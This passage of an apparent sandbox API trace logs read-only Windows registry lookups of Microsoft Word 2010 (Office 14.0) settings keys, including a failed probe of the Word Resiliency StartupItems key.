[0086.594] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.594] RegCloseKey (hKey=0x428) returned 0x0
[0086.594] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.594] RegCloseKey (hKey=0x428) returned 0x0
[0086.594] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x428) returned 0x0
[0086.594] RegCloseKey (hKey=0x428) returned 0x0
[0086.594] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x428) returned 0x0
[0086.594] RegCloseKey (hKey=0x428) returned 0x0
[0086.595] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x0) returned 0x2
[0086.595] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.595] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x428) returned 0x0
[0086.595] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.595] RegOpenKeyExW (in: hKey=0x428, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x408) returned 0x0
[0086.595] RegCloseKey (hKey=0x428) returned 0x0
[0086.595] RegQueryInfoKeyW (in: hKey=0x408, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.595] RegOpenKeyExW (in: hKey=0x408, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x428) returned 0x0
[0086.595] RegCloseKey (hKey=0x408) returned 0x0
[0086.595] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.596] RegOpenKeyExW (in: hKey=0x428, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x408) returned 0x0
[0086.596] RegCloseKey (hKey=0x428) returned 0x0
[0086.596] RegQueryInfoKeyW (in: hKey=0x408, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.596] RegOpenKeyExW (in: hKey=0x408, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x428) returned 0x0
[0086.596] RegCloseKey (hKey=0x408) returned 0x0
[0086.596] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.596] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0086.596] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.596] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x408) returned 0x0
[0086.596] RegQueryInfoKeyW (in: hKey=0x408, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.596] RegOpenKeyExW (in: hKey=0x408, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x424) returned 0x0
[0086.596] RegCloseKey (hKey=0x408) returned 0x0
[0086.596] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.596] RegOpenKeyExW (in: hKey=0x424, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x408) returned 0x0
[0086.596] RegCloseKey (hKey=0x424) returned 0x0
[0086.597] RegQueryInfoKeyW (in: hKey=0x408, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.597] RegOpenKeyExW (in: hKey=0x408, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x424) returned 0x0
[0086.597] RegCloseKey (hKey=0x408) returned 0x0
[0086.597] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.597] RegOpenKeyExW (in: hKey=0x424, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x408) returned 0x0
[0086.597] RegCloseKey (hKey=0x424) returned 0x0
[0086.597] RegQueryInfoKeyW (in: hKey=0x408, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.597] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0086.597] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.597] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x0) returned 0x2
[0086.597] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.597] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x424) returned 0x0
[0086.597] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.597] RegOpenKeyExW (in: hKey=0x424, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x410) returned 0x0
[0086.597] RegCloseKey (hKey=0x424) returned 0x0
[0086.598] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.598] RegOpenKeyExW (in: hKey=0x410, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x424) returned 0x0
[0086.598] RegCloseKey (hKey=0x410) returned 0x0
[0086.598] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.598] RegOpenKeyExW (in: hKey=0x424, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x410) returned 0x0
[0086.598] RegCloseKey (hKey=0x424) returned 0x0
[0086.598] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.598] RegOpenKeyExW (in: hKey=0x410, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x424) returned 0x0
[0086.598] RegCloseKey (hKey=0x410) returned 0x0
[0086.598] RegQueryInfoKeyW (in: hKey=0x424, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.598] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0086.598] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.598] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x410) returned 0x0
[0086.598] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.598] RegOpenKeyExW (in: hKey=0x410, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
[0086.599] RegCloseKey (hKey=0x410) returned 0x0
[0086.599] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.599] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x410) returned 0x0
[0086.599] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.599] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.599] RegOpenKeyExW (in: hKey=0x410, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
[0086.599] RegCloseKey (hKey=0x410) returned 0x0
[0086.599] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.599] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x410) returned 0x0
[0086.599] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.599] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.599] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0086.599] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.599] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b4) returned 0x0
[0086.600] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.600] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3b4) returned 0x0
[0086.600] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.600] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3b4) returned 0x0
[0086.600] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.600] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
[0086.600] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.600] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
[0086.600] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.600] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b4) returned 0x0
[0086.600] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.600] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3b4) returned 0x0
[0086.600] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.600] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3b4) returned 0x0
[0086.600] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.601] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
[0086.601] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.601] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
